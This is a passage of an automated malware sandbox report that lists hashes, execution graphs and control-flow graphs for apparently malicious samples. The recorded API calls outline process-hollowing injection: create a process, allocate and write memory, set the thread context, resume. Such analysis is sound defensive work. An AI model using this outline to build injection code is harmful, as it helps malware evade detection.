                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5b43a3af90f1c01cdd1fd1b05ac4dc05ffbbf03e5642a960337e7bdc0b32904e
                                                  • Instruction ID: 7a4114fd6c429b2f4684547f5734fc58080e7f5daf3905861cc4eccf0fb53ed9
                                                  • Opcode Fuzzy Hash: 5b43a3af90f1c01cdd1fd1b05ac4dc05ffbbf03e5642a960337e7bdc0b32904e
                                                  • Instruction Fuzzy Hash: 8CF0C232B0010BCFEF649A94EA812B977E9EB80315F344426E905DFB66DB31DE02C791
                                                  Function 06915FF1 Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.4551562334.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_6910000_GestorRemesasCONFIRMIMING.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f37dda268783c6f8d254e667ff3048cc692d8e2e0ed1de933d5c091783465d1f
                                                  • Instruction ID: 47c6e44ed91a1109edb7ca7776acff2d715817ab2b290b8b722fe7f32ce5fc81
                                                  • Opcode Fuzzy Hash: f37dda268783c6f8d254e667ff3048cc692d8e2e0ed1de933d5c091783465d1f
                                                  • Instruction Fuzzy Hash: AFE01A71E191099FDB60CFB589847AA7BEAEF41308F3448A9D44ACB641E237C9428B50

                                                  Execution Graph

                                                  Execution Coverage:11%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:168
                                                  Total number of Limit Nodes:9
                                                  execution_graph 21514 6a1ad40 21515 6a1aecb 21514->21515 21517 6a1ad66 21514->21517 21517->21515 21518 6a176d0 21517->21518 21519 6a1afc0 PostMessageW 21518->21519 21520 6a1b02c 21519->21520 21520->21517 21338 6a17f79 21339 6a17f7f 21338->21339 21340 6a17f90 21339->21340 21344 6a19b29 21339->21344 21359 6a19b9e 21339->21359 21375 6a19b38 21339->21375 21345 6a19b52 21344->21345 21357 6a19b5a 21345->21357 21390 6a1a121 21345->21390 21395 6a1a4fe 21345->21395 21400 6a1a0d6 21345->21400 21405 6a1a432 21345->21405 21410 6a1a213 21345->21410 21415 6a1a28c 21345->21415 21419 6a1a22d 21345->21419 21424 6a19f6a 21345->21424 21428 6a1a18b 21345->21428 21433 6a1a026 21345->21433 21437 6a1a2e4 21345->21437 21441 6a1a5a0 21345->21441 21357->21340 21360 6a19b2c 21359->21360 21361 6a19ba1 21359->21361 21362 6a1a121 2 API calls 21360->21362 21363 6a1a5a0 2 API calls 21360->21363 21364 6a1a2e4 2 API calls 21360->21364 21365 6a1a026 2 API calls 21360->21365 21366 6a1a18b 2 API calls 21360->21366 21367 6a19f6a 2 API calls 21360->21367 21368 6a1a22d 2 API calls 21360->21368 21369 6a1a28c 2 API calls 21360->21369 21370 6a1a213 2 API calls 21360->21370 21371 6a1a432 2 API calls 21360->21371 21372 6a1a0d6 2 API calls 21360->21372 21373 6a19b5a 21360->21373 21374 6a1a4fe 2 API calls 21360->21374 21361->21340 21362->21373 21363->21373 21364->21373 21365->21373 21366->21373 21367->21373 21368->21373 21369->21373 21370->21373 21371->21373 21372->21373 21373->21340 21374->21373 21376 6a19b52 21375->21376 21377 6a1a121 2 API calls 21376->21377 21378 6a1a5a0 2 API calls 21376->21378 21379 6a1a2e4 2 API calls 21376->21379 21380 6a1a026 2 API calls 21376->21380 21381 6a1a18b 2 API calls 21376->21381 21382 6a19f6a 2 API calls 21376->21382 21383 6a1a22d 2 API calls 21376->21383 21384 6a1a28c 2 API calls 21376->21384 21385 6a1a213 2 API calls 21376->21385 21386 6a1a432 2 API calls 21376->21386 21387 6a1a0d6 2 API calls 21376->21387 21388 6a19b5a 21376->21388 21389 6a1a4fe 2 API calls 21376->21389 21377->21388 21378->21388 21379->21388 21380->21388 21381->21388 21382->21388 21383->21388 21384->21388 21385->21388 21386->21388 21387->21388 21388->21340 21389->21388 21391 6a1a144 21390->21391 21392 6a1a2c2 21391->21392 21445 6a17340 21391->21445 21449 6a17338 21391->21449 21453 6a17430 21395->21453 21457 6a17428 21395->21457 21396 6a1a473 21396->21395 21397 6a1a7d7 21396->21397 21397->21357 21401 6a1a0dc 21400->21401 21402 6a1a7be 21401->21402 21461 6a16cc0 21401->21461 21465 6a16cb8 21401->21465 21402->21357 21406 6a1a6ba 21405->21406 21469 6a16d70 21406->21469 21473 6a16d68 21406->21473 21407 6a1a60d 21407->21357 21411 6a1a0ed 21410->21411 21412 6a1a7be 21411->21412 21413 6a16cc0 ResumeThread 21411->21413 21414 6a16cb8 ResumeThread 21411->21414 21412->21357 21413->21411 21414->21411 21417 6a17340 WriteProcessMemory 21415->21417 21418 6a17338 WriteProcessMemory 21415->21418 21416 6a1a2c2 21417->21416 21418->21416 21420 6a1a1a2 21419->21420 21421 6a1a23a 21419->21421 21420->21419 21422 6a17340 WriteProcessMemory 21420->21422 21423 6a17338 WriteProcessMemory 21420->21423 21422->21420 21423->21420 21477 6a179c8 21424->21477 21481 6a179bc 21424->21481 21429 6a1a191 21428->21429 21430 6a1a23a 21429->21430 21431 6a17340 WriteProcessMemory 21429->21431 21432 6a17338 WriteProcessMemory 21429->21432 21431->21429 21432->21429 21435 6a16d70 Wow64SetThreadContext 21433->21435 21436 6a16d68 Wow64SetThreadContext 21433->21436 21434 6a1a045 21434->21357 21435->21434 21436->21434 21439 6a17340 WriteProcessMemory 21437->21439 21440 6a17338 WriteProcessMemory 21437->21440 21438 6a1a000 21438->21357 21439->21438 21440->21438 21485 6a17280 21441->21485 21489 6a17278 21441->21489 21442 6a1a5c6 21442->21357 21446 6a17388 WriteProcessMemory 21445->21446 21448 6a173df 21446->21448 21448->21392 21450 6a17388 WriteProcessMemory 21449->21450 21452 6a173df 21450->21452 21452->21392 21454 6a1747b ReadProcessMemory 21453->21454 21456 6a174bf 21454->21456 21456->21396 21458 6a1747b ReadProcessMemory 21457->21458 21460 6a174bf 21458->21460 21460->21396 21462 6a16d00 ResumeThread 21461->21462 21464 6a16d31 21462->21464 21464->21401 21466 6a16d00 ResumeThread 21465->21466 21468 6a16d31 21466->21468 21468->21401 21470 6a16db5 Wow64SetThreadContext 21469->21470 21472 6a16dfd 21470->21472 21472->21407 21474 6a16db5 Wow64SetThreadContext 21473->21474 21476 6a16dfd 21474->21476 21476->21407 21478 6a17a51 CreateProcessA 21477->21478 21480 6a17c13 21478->21480 21482 6a179c6 CreateProcessA 21481->21482 21484 6a17c13 21482->21484 21486 6a172c0 VirtualAllocEx 21485->21486 21488 6a172fd 21486->21488 21488->21442 21490 6a1727d VirtualAllocEx 21489->21490 21492 6a172fd 21490->21492 21492->21442 21296 273d0b8 21297 273d0fe 21296->21297 21300 273d298 21297->21300 21303 273c9a0 21300->21303 21304 273d300 DuplicateHandle 21303->21304 21305 273d1eb 21304->21305 21306 273ad38 21310 273ae21 21306->21310 21318 273ae30 21306->21318 21307 273ad47 21311 273ae30 21310->21311 21312 273ae64 21311->21312 21326 273b0c3 21311->21326 21330 273b0c8 21311->21330 21312->21307 21313 273ae5c 21313->21312 21314 273b068 GetModuleHandleW 21313->21314 21315 273b095 21314->21315 21315->21307 21319 273ae41 21318->21319 21320 273ae64 21318->21320 21319->21320 21324 273b0c3 LoadLibraryExW 21319->21324 21325 273b0c8 LoadLibraryExW 21319->21325 21320->21307 21321 273ae5c 21321->21320 21322 273b068 GetModuleHandleW 21321->21322 21323 273b095 21322->21323 21323->21307 21324->21321 21325->21321 21327 273b0dc 21326->21327 21329 273b101 21327->21329 21334 273a870 21327->21334 21329->21313 21331 273b0dc 21330->21331 21332 273a870 LoadLibraryExW 21331->21332 21333 273b101 21331->21333 21332->21333 21333->21313 21335 273b2a8 LoadLibraryExW 21334->21335 21337 273b321 21335->21337 21337->21329 21493 2734668 21494 273467a 21493->21494 21495 2734686 21494->21495 21497 2734779 21494->21497 21498 2734788 21497->21498 21502 2734883 21498->21502 21506 2734888 21498->21506 21504 2734888 21502->21504 21503 273498c 21504->21503 21510 273449c 21504->21510 21507 27348af 21506->21507 21508 273498c 21507->21508 21509 273449c CreateActCtxA 21507->21509 21509->21508 21511 2735918 CreateActCtxA 21510->21511 21513 27359db 21511->21513

                                                  Executed Functions

                                                  Function 06A179BC Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 6a179bc-6a17a5d 3 6a17a96-6a17ab6 0->3 4 6a17a5f-6a17a69 0->4 11 6a17ab8-6a17ac2 3->11 12 6a17aef-6a17b1e 3->12 4->3 5 6a17a6b-6a17a6d 4->5 6 6a17a90-6a17a93 5->6 7 6a17a6f-6a17a79 5->7 6->3 9 6a17a7b 7->9 10 6a17a7d-6a17a8c 7->10 9->10 10->10 13 6a17a8e 10->13 11->12 14 6a17ac4-6a17ac6 11->14 18 6a17b20-6a17b2a 12->18 19 6a17b57-6a17c11 CreateProcessA 12->19 13->6 16 6a17ae9-6a17aec 14->16 17 6a17ac8-6a17ad2 14->17 16->12 20 6a17ad4 17->20 21 6a17ad6-6a17ae5 17->21 18->19 23 6a17b2c-6a17b2e 18->23 32 6a17c13-6a17c19 19->32 33 6a17c1a-6a17ca0 19->33 20->21 21->21 22 6a17ae7 21->22 22->16 24 6a17b51-6a17b54 23->24 25 6a17b30-6a17b3a 23->25 24->19 27 6a17b3c 25->27 28 6a17b3e-6a17b4d 25->28 27->28 28->28 30 6a17b4f 28->30 30->24 32->33 43 6a17cb0-6a17cb4 33->43 44 6a17ca2-6a17ca6 33->44 46 6a17cc4-6a17cc8 43->46 47 6a17cb6-6a17cba 43->47 44->43 45 6a17ca8 44->45 45->43 49 6a17cd8-6a17cdc 46->49 50 6a17cca-6a17cce 46->50 47->46 48 6a17cbc 47->48 48->46 51 6a17cee-6a17cf5 49->51 52 6a17cde-6a17ce4 49->52 50->49 53 6a17cd0 50->53 54 6a17cf7-6a17d06 51->54 55 6a17d0c 51->55 52->51 53->49 54->55 57 6a17d0d 55->57 57->57
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A17BFE
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 59ca9d7be4681c8084791c3cfaf7cf310b3a2c7a84204ec7bd5796f177f276c0
                                                  • Instruction ID: b2737fe8b1d9e914558e3c57a3d954a5e3bdf449cf231c96ed63f641a5a3c7ac
                                                  • Opcode Fuzzy Hash: 59ca9d7be4681c8084791c3cfaf7cf310b3a2c7a84204ec7bd5796f177f276c0
                                                  • Instruction Fuzzy Hash: 36A15D71D00619CFEB65DF68C8417EEBBB2FF48310F1485A9E809AB240DB749A85CF91
                                                  Function 06A179C8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 58 6a179c8-6a17a5d 60 6a17a96-6a17ab6 58->60 61 6a17a5f-6a17a69 58->61 68 6a17ab8-6a17ac2 60->68 69 6a17aef-6a17b1e 60->69 61->60 62 6a17a6b-6a17a6d 61->62 63 6a17a90-6a17a93 62->63 64 6a17a6f-6a17a79 62->64 63->60 66 6a17a7b 64->66 67 6a17a7d-6a17a8c 64->67 66->67 67->67 70 6a17a8e 67->70 68->69 71 6a17ac4-6a17ac6 68->71 75 6a17b20-6a17b2a 69->75 76 6a17b57-6a17c11 CreateProcessA 69->76 70->63 73 6a17ae9-6a17aec 71->73 74 6a17ac8-6a17ad2 71->74 73->69 77 6a17ad4 74->77 78 6a17ad6-6a17ae5 74->78 75->76 80 6a17b2c-6a17b2e 75->80 89 6a17c13-6a17c19 76->89 90 6a17c1a-6a17ca0 76->90 77->78 78->78 79 6a17ae7 78->79 79->73 81 6a17b51-6a17b54 80->81 82 6a17b30-6a17b3a 80->82 81->76 84 6a17b3c 82->84 85 6a17b3e-6a17b4d 82->85 84->85 85->85 87 6a17b4f 85->87 87->81 89->90 100 6a17cb0-6a17cb4 90->100 101 6a17ca2-6a17ca6 90->101 103 6a17cc4-6a17cc8 100->103 104 6a17cb6-6a17cba 100->104 101->100 102 6a17ca8 101->102 102->100 106 6a17cd8-6a17cdc 103->106 107 6a17cca-6a17cce 103->107 104->103 105 6a17cbc 104->105 105->103 108 6a17cee-6a17cf5 106->108 109 6a17cde-6a17ce4 106->109 107->106 110 6a17cd0 107->110 111 6a17cf7-6a17d06 108->111 112 6a17d0c 108->112 109->108 110->106 111->112 114 6a17d0d 112->114 114->114
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06A17BFE
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 1fa6c5b7d6fd14f5f0702baba5df5f291e8fc1632199e63d942b13828f7ac01d
                                                  • Instruction ID: f55a8885f0062433528def6b663031ccbb5e7865a74bcc7f6a980083a3376a70
                                                  • Opcode Fuzzy Hash: 1fa6c5b7d6fd14f5f0702baba5df5f291e8fc1632199e63d942b13828f7ac01d
                                                  • Instruction Fuzzy Hash: F3914C71D00619CFEB61DF69C8417EEBBB2BF48310F1485A9E809AB240DB749A85CF91
                                                  Function 0273AE30 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 115 273ae30-273ae3f 116 273ae41-273ae4e call 2739838 115->116 117 273ae6b-273ae6f 115->117 124 273ae50 116->124 125 273ae64 116->125 118 273ae83-273aec4 117->118 119 273ae71-273ae7b 117->119 126 273aed1-273aedf 118->126 127 273aec6-273aece 118->127 119->118 170 273ae56 call 273b0c3 124->170 171 273ae56 call 273b0c8 124->171 125->117 128 273af03-273af05 126->128 129 273aee1-273aee6 126->129 127->126 131 273af08-273af0f 128->131 132 273aef1 129->132 133 273aee8-273aeef call 273a814 129->133 130 273ae5c-273ae5e 130->125 134 273afa0-273b060 130->134 135 273af11-273af19 131->135 136 273af1c-273af23 131->136 138 273aef3-273af01 132->138 133->138 165 273b062-273b065 134->165 166 273b068-273b093 GetModuleHandleW 134->166 135->136 139 273af30-273af39 call 273a824 136->139 140 273af25-273af2d 136->140 138->131 146 273af46-273af4b 139->146 147 273af3b-273af43 139->147 140->139 148 273af69-273af6d 146->148 149 273af4d-273af54 146->149 147->146 152 273af73-273af76 148->152 149->148 151 273af56-273af66 call 273a834 call 273a844 149->151 151->148 155 273af99-273af9f 152->155 156 273af78-273af96 152->156 156->155 165->166 167 273b095-273b09b 166->167 168 273b09c-273b0b0 166->168 167->168 170->130 171->130
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 0273B086
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165827949.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_2730000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 8eb1f7abe544baddcdaab53a0c67fee3ad0b2b951391df29ed79766caa7fb67b
                                                  • Instruction ID: 47ddeb52ddf92dcc0b6fa1f116dd5fd01578ec9bd87b53952ea3605f68590652
                                                  • Opcode Fuzzy Hash: 8eb1f7abe544baddcdaab53a0c67fee3ad0b2b951391df29ed79766caa7fb67b
                                                  • Instruction Fuzzy Hash: B27113B0A00B068FDB25DF29D14575ABBF2FF88704F00892DD48AD7A51DB75E845CB91
                                                  Function 0273449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 172 273449c-27359d9 CreateActCtxA 175 27359e2-2735a3c 172->175 176 27359db-27359e1 172->176 183 2735a4b-2735a4f 175->183 184 2735a3e-2735a41 175->184 176->175 185 2735a51-2735a5d 183->185 186 2735a60 183->186 184->183 185->186 188 2735a61 186->188 188->188
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 027359C9
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165827949.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_2730000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: da2dc4e65f5271ca91599da29b888b03cb0341ed234ae46d6e0d2b6122a825db
                                                  • Instruction ID: a3f81a43457d192ce0ed14f1ea25cdba9db2684850207eded462e538855d050a
                                                  • Opcode Fuzzy Hash: da2dc4e65f5271ca91599da29b888b03cb0341ed234ae46d6e0d2b6122a825db
                                                  • Instruction Fuzzy Hash: 7941F3B0C0071DCBEB25CFA9C98478EBBF5BF48704F60806AD408AB251DBB56945CF90
                                                  Function 02735910 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 189 2735910 190 273591c-27359d9 CreateActCtxA 189->190 192 27359e2-2735a3c 190->192 193 27359db-27359e1 190->193 200 2735a4b-2735a4f 192->200 201 2735a3e-2735a41 192->201 193->192 202 2735a51-2735a5d 200->202 203 2735a60 200->203 201->200 202->203 205 2735a61 203->205 205->205
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 027359C9
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165827949.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_2730000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 0d9e697e36c12db19ddab084583475e6ebeba93ab3f8f48dc827d2d405800b7b
                                                  • Instruction ID: 4ec3a6be996480bbea8b561bf975dcaf186f60c7a2863aa053e17e28f8c33dbe
                                                  • Opcode Fuzzy Hash: 0d9e697e36c12db19ddab084583475e6ebeba93ab3f8f48dc827d2d405800b7b
                                                  • Instruction Fuzzy Hash: AE41E2B0D0071DCBEB25CFA9C98478DBBF5BF48704F60856AD408AB251DBB56945CF90
                                                  Function 06A17340 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 206 6a17340-6a1738e 208 6a17390-6a1739c 206->208 209 6a1739e-6a173dd WriteProcessMemory 206->209 208->209 211 6a173e6-6a17416 209->211 212 6a173df-6a173e5 209->212 212->211
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A173D0
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: e6d4f8ec02cea7ac981c9d0d4208db5d593b51f8fc040b410198d74a5fc89410
                                                  • Instruction ID: 20ea6b6a6c9fe273d033deace7a69894b7d71358e57c70cc7a3661e0002dd0d2
                                                  • Opcode Fuzzy Hash: e6d4f8ec02cea7ac981c9d0d4208db5d593b51f8fc040b410198d74a5fc89410
                                                  • Instruction Fuzzy Hash: 072115759003499FDB10DFA9C885BDEBBF5BF48310F108429E918A7240C7789954CBA4
                                                  Function 06A17338 Relevance: 1.6, APIs: 1, Instructions: 68injectionCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 216 6a17338-6a1738e 218 6a17390-6a1739c 216->218 219 6a1739e-6a173dd WriteProcessMemory 216->219 218->219 221 6a173e6-6a17416 219->221 222 6a173df-6a173e5 219->222 222->221
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06A173D0
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: b875a038d5c9b8f9a999fcfa5e571a33de6f412287e7047f4e131eeedba07323
                                                  • Instruction ID: 1f8bd7c27e5c1a9c9da32c20277bfb05d1bb5f23a8e5a65980e96cddd30ca81d
                                                  • Opcode Fuzzy Hash: b875a038d5c9b8f9a999fcfa5e571a33de6f412287e7047f4e131eeedba07323
                                                  • Instruction Fuzzy Hash: 28212676900349CFDF10DFA9C9817EEBBF5BF48310F10842AE959A7240C7789555CB64
                                                  Function 0273C9A0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 226 273c9a0-273d394 DuplicateHandle 228 273d396-273d39c 226->228 229 273d39d-273d3ba 226->229 228->229
                                                  APIs
                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0273D2C6,?,?,?,?,?), ref: 0273D387
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2165827949.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Offset: 02730000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_2730000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: DuplicateHandle
                                                  • String ID:
                                                  • API String ID: 3793708945-0
                                                  • Opcode ID: b1497f362c351c8fa98314542bbd5dd9f823e745044b96c69906d9b1cdef5acf
                                                  • Instruction ID: 58308f626d8102c2fe463b49d8c8651d23a808a355b0374f25850d23c0ae4725
                                                  • Opcode Fuzzy Hash: b1497f362c351c8fa98314542bbd5dd9f823e745044b96c69906d9b1cdef5acf
                                                  • Instruction Fuzzy Hash: 1E2105B5900308DFDB10CF9AD984ADEBBF4FB48310F10801AE914A3310D378A954CFA0
                                                  Function 06A17428 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 252 6a17428-6a174bd ReadProcessMemory 255 6a174c6-6a174f6 252->255 256 6a174bf-6a174c5 252->256 256->255
                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A174B0
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: 2960a0736ba572b6ff8f242566241de94d2f6602350361ffc5ede13bf7041b46
                                                  • Instruction ID: 79e3faa01a875d314e0320dce3727336b8c30dc8b35e1546b2e8784c8031a8f8
                                                  • Opcode Fuzzy Hash: 2960a0736ba572b6ff8f242566241de94d2f6602350361ffc5ede13bf7041b46
                                                  • Instruction Fuzzy Hash: 282123B18003498FDB10CFA9C880BEEBBF5BF48310F10842AE559A7240CB789910CBA0
                                                  Function 06A17430 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 260 6a17430-6a174bd ReadProcessMemory 263 6a174c6-6a174f6 260->263 264 6a174bf-6a174c5 260->264 264->263
                                                  APIs
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06A174B0
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessRead
                                                  • String ID:
                                                  • API String ID: 1726664587-0
                                                  • Opcode ID: a8045c3420cd34574418e2d34a59a1fd92be1dcd357db5e3d8799cc0dc9c9dff
                                                  • Instruction ID: 95c24818ae4c38f7250f93e1ec1fe03278d7a6cf735dc3ac05d8046b08dd778f
                                                  • Opcode Fuzzy Hash: a8045c3420cd34574418e2d34a59a1fd92be1dcd357db5e3d8799cc0dc9c9dff
                                                  • Instruction Fuzzy Hash: 0E2116B18003499FDB10DFAAC881ADEBBF5FF48310F108429E518A7240C7789950CBA5
                                                  Function 06A16D68 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 232 6a16d68-6a16dbb 234 6a16dcb-6a16dfb Wow64SetThreadContext 232->234 235 6a16dbd-6a16dc9 232->235 237 6a16e04-6a16e34 234->237 238 6a16dfd-6a16e03 234->238 235->234 238->237
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A16DEE
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: bebfd0dbbcaefefcb961791c96c01ab6c8000e31b298ff8c1688e6dcba9c2a9b
                                                  • Instruction ID: f6fee6f2d315ec8e5daab4f8dc97ea5bba2721ff0cd36d899d8dcb44fe2814c7
                                                  • Opcode Fuzzy Hash: bebfd0dbbcaefefcb961791c96c01ab6c8000e31b298ff8c1688e6dcba9c2a9b
                                                  • Instruction Fuzzy Hash: AE215475900309CFEB50DFA9C5807EEBBF5AF88324F24842AD559AB240CB789945CFA0
                                                  Function 06A16D70 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 242 6a16d70-6a16dbb 244 6a16dcb-6a16dfb Wow64SetThreadContext 242->244 245 6a16dbd-6a16dc9 242->245 247 6a16e04-6a16e34 244->247 248 6a16dfd-6a16e03 244->248 245->244 248->247
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A16DEE
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_6a10000_XNYbGrcoFr.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: cfe7eba2b7c26153860c274043ffdbad8a22b9e3b4859485c0334af5e2660f61
                                                  • Instruction ID: 2a2a4493f0fdc397b28a7df799d9efee600327208c60537e20d5c6b3c85c3213
                                                  • Opcode Fuzzy Hash: cfe7eba2b7c26153860c274043ffdbad8a22b9e3b4859485c0334af5e2660f61
                                                  • Instruction Fuzzy Hash: 25213871D007098FDB50DFAAC4857AEBBF4AF88324F148429D519AB240CB789944CFA5
                                                  Function 06A17278 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 268 6a17278-6a172fb VirtualAllocEx 273 6a17304-6a17329 268->273 274 6a172fd-6a17303 268->274 274->273
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06A172EE
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.2169899509.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                  Joe Sandbox IDA Plugin
